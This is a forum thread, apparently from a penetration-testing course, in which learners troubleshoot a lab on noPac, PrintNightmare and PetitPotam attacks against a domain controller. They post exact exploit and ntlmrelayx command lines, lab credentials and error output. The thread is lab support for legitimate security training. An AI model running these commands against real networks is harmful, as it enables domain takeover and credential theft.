Active Directory Enumeration & Attacks: Bleeding Edge Vulnerabilities

Howdy everyone,

I have been trying for hours and hours to gain a shell on the DC01 host. I've tried all 3 exploits numerous times, and fail each time. Tried resetting the VM numerous times, and have done everything verbatim how it is presented in the module. Have also tried others' suggestions on previous posts for this module, all to no avail. I think there may be a bug or something because I've tried everything I can think of.

For the noPac.py exploit, I am getting the following error:

[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[-] [Errno 104] Connection reset by peer
[-] GetST error, error: [Errno 104] Connection reset by peer

And for the PrintNightmare exploit, I get the following error:

┌─[✗]─[root@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'
[*] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
The NETBIOS connection with the remote host timed out.

And finally, for the PetitPotam.py exploit, I get the following error:

[-] Sending EfsRpcOpenFileRaw!
Something went wrong, check error status => The NETBIOS connection with the remote host timed out.
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/nmb.py", line 984, in non_polling_read
    received = self._sock.recv(bytes_left)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/PetitPotam/PetitPotam.py", line 461, in <module>
    main()
  File "/opt/PetitPotam/PetitPotam.py", line 457, in main
    dce.disconnect()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 806, in disconnect

-SNIP-

And additionally for PetitPotam, on the ntlmrelayx window, I get the following over and over again:

HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL as INLANEFREIGHT/ACADEMY-EA-DC01$ SUCCEED
[*] Skipping user ACADEMY-EA-DC01$ since attack was already performed
[*] SMBD-Thread-4: Connection from INLANEFREIGHT/ACADEMY-EA-DC01$@172.16.5.5 controlled, attacking target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL

I am to the point of skipping this part of the module as I have seriously tried everything. At first I thought maybe I should be using the 10. IP of the attack host for exploits, but people mentioned in other posts for this that the local IP needs to be the 172.16.5.225 address. That part was extra confusing, as you will see both IPs pop up when typing ifconfig.

Is anyone else having issues similar to this on this module? I really think that it might be bugged or something. As again, I am doing everything verbatim as it's presented. And I have tried every single suggestion on all previous posts related to this module. Could it have something to do with the wrong Impacket version being installed on the attack host? If so, there is no way to download the suggested Impacket version, as the attack host has no connection to the external internet. :confused:

I am also attempting this lab with PetitPotam and every time, after many resets of the lab, the ntlmrelayx.py output gets stuck and freezes at [*] GOT CERTIFICATE!
Uploaded a fresh PetitPotam.py but no luck, same error: "host timed out".

./PetitPotam.py 172.16.5.225 172.16.5.5 -d inlanefreight.local -dc-ip 172.16.5.5

sudo python3 ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

out of ideas.


Wow, I can't even get the PetitPotam exploit to get to that point! I'm probably going to open a ticket with support, because I really think the lab is bugged. I've re-read the module a few times and reset the machine more times than I can count. None of the 3 exploits have worked for me yet. Gotta be something wrong on the back end because I don't see anything that I am missing or doing incorrectly.

Howdy Skippy,

I would give it a try again. All the exploits seem to be working for me now. I opened a ticket with support and was informed that there were some issues with US servers the other day, so that may have been what caused the problems we ran into.


Hey Joseph, thanks so much for coming back and letting me know, will test later. \o/
